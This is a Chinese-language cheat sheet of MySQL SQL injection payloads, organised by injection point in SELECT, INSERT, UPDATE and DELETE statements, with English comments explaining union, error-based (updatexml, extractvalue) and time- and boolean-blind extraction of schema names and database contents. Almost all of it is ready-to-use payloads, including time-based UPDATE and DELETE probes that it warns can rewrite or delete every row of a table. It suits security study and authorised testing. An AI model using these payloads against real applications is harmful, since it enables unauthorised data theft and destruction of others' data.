总结一下MySQL的注入点。

SELECT注入

select expr

不带反引号

-- select_expr injection point, unquoted column: a parenthesised scalar subquery is
-- itself a valid select_expr, so it simply replaces the column name; `#` comments
-- out the rest of the original statement. Returns one comma-separated list of
-- schema names.
select (select group_concat(schema_name)from information_schema.schemata);#

带反引号包裹

-- select_expr injection point, backtick-quoted column: close the backtick and
-- continue. Backticks act as token separators, so no spaces are needed around
-- `from` and the table name (handy when spaces are filtered).
select `schema_name`from`information_schema`.`schemata`;#

table_reference

子查询的结果集可以在外部查询中使用,赋予别名以引用。

不带反引号

-- table_reference injection point, unquoted: the injected derived table takes the
-- place of the original table name. MySQL requires an alias on every derived
-- table, hence the trailing `t`.
select * from(select group_concat(schema_name) from information_schema.schemata)t;#

带反引号包裹

-- table_reference injection point, backtick-quoted: close the quote, suppress the
-- original rows with `where 1=0`, then UNION in our data. The UNION branch must
-- have exactly as many columns as the left-hand table: six matches
-- information_schema.schemata on MySQL 8.0.16+ (DEFAULT_ENCRYPTION was added there);
-- older servers have five, so verify the count on the target and adjust the padding.
select * from`information_schema`.`schemata`where 1=0 union select group_concat(schema_name),1,1,1,1,1 from information_schema.schemata;#

where_condition

判断技巧:传入 2-1 与传入 1 返回相同结果,说明参数被当作数字参与运算(数字型);传入 1a' 之类带引号的值时报错或结果变化,说明参数被引号包裹(字符型)。

WHERE

数字型

-- WHERE injection, numeric parameter: `id=-1` matches nothing, so only the UNION
-- rows come back. The UNION must supply the same number of columns as table1
-- (two in this example).
select * from table1 WHERE id=-1 union select 1,group_concat(schema_name) from information_schema.schemata;#

字符型

-- WHERE injection, string parameter: the payload starts inside the quotes, closes
-- them with `'`, appends the UNION, and `#` comments out the application's own
-- closing quote and anything after it.
select * from table1 WHERE id='-1' union select 1,group_concat(schema_name) from information_schema.schemata;#

HAVING

数字型

-- HAVING injection, numeric parameter: MySQL accepts HAVING without GROUP BY, so
-- the same "match nothing, then UNION" pattern as WHERE applies.
select * from table1 HAVING id=-1 union select 1,group_concat(schema_name) from information_schema.schemata;#

字符型

-- HAVING injection, string parameter: close the quote, UNION, comment out the rest.
select * from table1 HAVING id='-1' union select 1,group_concat(schema_name) from information_schema.schemata;#

After ORDER BY/GROUP BY

ORDER BY

测试注入点

-- ORDER BY probe, numeric position: the sort-key expression is evaluated for every
-- row, so the total delay is roughly sleep(1) x row count rather than a single
-- second -- keep the sleep short on large tables.
select * from table1 order by if(1=1,sleep(1),1);
-- ORDER BY probe, string position: `'1'` closes the application's quote and a
-- second sort key carrying the payload is appended after the comma.
select * from table1 order by '1',if(1=1,sleep(1),1);

数字型

-- ORDER BY error-based, numeric: updatexml() raises an XPath syntax error whose
-- message echoes the concat() argument. MySQL shows at most 32 characters of it,
-- hence substr(...,1,30) plus the 0x7e (~) marker; move the substr offset to read
-- the next chunk.
select * from table1 order by updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata limit 0,1),1,30)),0);

字符型

-- ORDER BY error-based, string position: same as the numeric form, with `'1'`
-- closing the application's quote first.
select * from table1 order by '1',updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata limit 0,1),1,30)),0);

基于 rand(seed) 的布尔盲注:rand(0) 与 rand(1) 各自产生固定的伪随机序列,因而条件真假会导致不同但确定的行序,对比结果顺序即可判断;行数太少时两种顺序难以区分,不适用。

-- ORDER BY boolean blind via rand(seed): the condition yields 0 or 1, and rand(0)
-- and rand(1) each produce a fixed pseudo-random sequence, so the returned row
-- order reveals the truth value. Calibrate against a known-true and a known-false
-- probe first; needs enough rows for the two orders to differ visibly.
select * from table1 order by rand(ascii(mid((select database()),1,1))>96)

GROUP BY

测试注入点

-- GROUP BY probe: under MySQL's default SQL mode `"id"` is a string literal (it is
-- an identifier only with ANSI_QUOTES), so this groups by a constant and then by
-- the injected expression, which is evaluated per row like an ORDER BY key.
select group_concat(id) from table1 group by "id",if(1=1,sleep(1),1);

报错注入

-- GROUP BY error-based: the injected grouping expression raises the updatexml
-- XPath error carrying up to ~30 characters of the extracted data.
select group_concat(id) from table1 group by "id",updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata limit 0,1),1,30)),0);

After LIMIT

适用于原语句在 LIMIT 之前已有 ORDER BY、无法再追加 UNION 的情况

适用版本 MySQL 5.0.0-5.6.6(PROCEDURE ANALYSE 是 SELECT 专有语法,MySQL 8.0 已移除;更新的 5.x 版本据报会拒绝其参数中的子查询)

-- LIMIT injection: after `LIMIT n` the grammar only allows PROCEDURE / INTO, so the
-- error-based payload is smuggled in as the PROCEDURE ANALYSE argument. SELECT-only
-- syntax, gone in MySQL 8.0; the quoted 5.0.0-5.6.6 range reflects that newer
-- servers reportedly refuse a subquery here -- confirm on the target.
select * from table1 limit 1 procedure analyse(extractvalue(1, concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata limit 0,1),1,30),0x7e)));

INSERT注入

测试注入点

-- INSERT probe in value_list: `'1' and if(...)` is one boolean expression, so the
-- statement succeeds and a row IS inserted (value 0 here, since sleep() returns 0).
-- Every probe leaves a row behind -- clean up afterwards.
insert into table1 values(1,'1' and if(1=1,sleep(1),1));#

tbl_name

-- INSERT tbl_name injection: the payload after the table name supplies its own
-- VALUES and `#` comments out the application's VALUES (shown after the `#` for
-- reference). The updatexml XPath error should abort the statement, so no row is
-- written and the data shows up only in the error message.
INSERT into table1 values(4 and updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata),1,30),0x7e),1),'2');#values(4,"2");

value_list

-- INSERT value_list error-based: extractvalue() raises the XPath error while the
-- value is evaluated, so the row is not inserted and the data is echoed in the error.
insert into table1 values(4,'2' and extractvalue(1, concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata limit 0,1),1,30),0x7e)));#

tbl_name 注入点的做法相同:在表名之后自行补上 VALUES 并在其中写入报错函数,再用 # 注释掉原语句后面的部分,通过报错信息回显数据。

没有报错回显时只能用延时盲注;注意 INSERT 每探测一次都会真正插入一行,测试完需清理。

-- INSERT time-based blind, one character at a time: 116 is 't', so a ~1s delay
-- means the first character of the current database is 't'. Because a single row
-- is evaluated, sleep() fires at most once -- but each probe inserts a row.
insert into table1 values(1,'1' and if(ord(substr((select database()),1,1))=116,sleep(1),1));#

UPDATE注入

table_reference

报错注入

-- UPDATE table_reference injection, error-based: the injected SET replaces the
-- application's own SET/WHERE (shown after `#`). With no WHERE this statement
-- would touch every row, but the extractvalue XPath error aborts it (statement-level
-- rollback on InnoDB) before rows are changed -- safe only as long as the error
-- actually fires.
UPDATE table1 SET id=0 or extractvalue(1, concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata limit 0,1),1,30),0x7e));# SET id=0 where id=0;

延时注入(注意:原语句的 WHERE 已被注释掉,这条语句会改写 table1 的全部行)

-- UPDATE table_reference injection, time-based -- DESTRUCTIVE: the application's
-- WHERE is commented out, so every row of table1 gets id = (0 or if(...)), i.e.
-- 0 or 1, and sleep(1) fires once per row, so the delay scales with table size.
-- Only run against data you can restore; prefer the error-based variant whenever
-- errors are displayed.
UPDATE table1 SET id=0 or if(ord(substr(database(),1,1))>95,sleep(1),1);# SET id=0 where id=0;

assignment_list

报错注入

-- UPDATE assignment_list injection, error-based: the assigned value becomes
-- `0 or extractvalue(...)` and `#` drops any WHERE that followed. The XPath error
-- aborts the statement, so no row is rewritten and the data appears in the error.
UPDATE table1 SET id=0 or extractvalue(1, concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata limit 0,1),1,30),0x7e));#

延时注入(注意:# 注释掉了后面的 WHERE,这条语句会改写 table1 的全部行)

-- UPDATE assignment_list injection, time-based -- DESTRUCTIVE: any WHERE after the
-- injection point is commented out, so every row has its id rewritten to
-- (0 or if(...)) = 0 or 1, and sleep(1) runs once per row. Use only where the
-- damage is acceptable (or on a copy); prefer error-based when errors are shown.
UPDATE table1 SET id=0 or if(ord(substr(database(),1,1))>95,sleep(1),1);#

where_condition

报错注入

-- UPDATE where_condition injection, error-based: the XPath error is raised while
-- the WHERE is evaluated, so the statement aborts before any row is changed.
UPDATE table1 SET id=0 where id=0 or extractvalue(1, concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata limit 0,1),1,30),0x7e));#

延时注入(注意:探测条件为假时 if() 返回 1,`id=0 or 1` 匹配全表,会把所有行的 id 改为 0;可改用 and 并限定到已知存在的 id)

-- UPDATE where_condition injection, time-based -- DESTRUCTIVE when the probe is
-- false: if() then returns 1, `id=0 or 1` is true for every row and the whole
-- table is set to id=0. When true, sleep(1) returns 0 and runs once per row
-- scanned, so the delay scales with table size. Joining the probe with `and` to
-- the id of a row known to exist confines both the update and the sleep to the
-- rows matching that id.
UPDATE table1 SET id=0 where id=0 or if(ord(substr(database(),1,1))>95,sleep(1),1);#

After order by

原因尚未弄清:报错函数的参数只是短表达式时能正常报错,子查询一旦带上 from 和 where 就不再报错(下面两条可对照)。

-- UPDATE after ORDER BY: MySQL allows ORDER BY on a single-table UPDATE, so an
-- error function can be injected as the sort key. `where id=1` still scopes the
-- update to that row. This short form (no FROM/WHERE in the subquery) is the one
-- the author reports as raising the error.
UPDATE table1 set id=1 where id=1 order by updatexml(1,concat(0x7e,substr((select database()),1,30)),0);

截图

-- UPDATE after ORDER BY with a subquery that carries FROM/WHERE: per the note above
-- this variant did not raise the error in the author's test (cause undetermined),
-- so verify on the target before relying on it. Third updatexml argument is 1
-- here rather than 0; either value works since the XPath error fires first.
UPDATE table1 set id=1 where id=1 order by updatexml(1, concat(0x7e,substr((select column_name from information_schema.columns where table_name='table1' limit 0,1),1,30)),1);

截图


After LIMIT

与 SELECT 的 LIMIT 注入思路类似,但 PROCEDURE ANALYSE 只属于 SELECT 语法,UPDATE ... LIMIT 之后能否同样利用尚未验证。


DELETE注入

还没见过DELETE注入,大概率在where_condition

where_condition

报错注入

-- DELETE where_condition injection, error-based: the XPath error is raised while
-- the WHERE is evaluated, so the statement aborts and nothing should be deleted.
DELETE FROM table1 WHERE id=0 or extractvalue(1, concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata limit 0,1),1,30),0x7e));#

延时注入(注意:探测条件为假时 if() 返回 1,`id=0 or 1` 匹配全表,会删除所有行;应改用 and 并限定到已知存在的 id)

-- DELETE where_condition injection, time-based -- DESTRUCTIVE when the probe is
-- false: if() then returns 1, `id=0 or 1` is true for every row and the entire
-- table is deleted. When true, sleep(1) returns 0 and runs once per row scanned.
-- Combine the probe with `and` and the id of a known row (or test on a copy) so a
-- wrong guess cannot wipe the table.
DELETE FROM table1 WHERE id=0 or if(ord(substr(database(),1,1))>95,sleep(1),1);#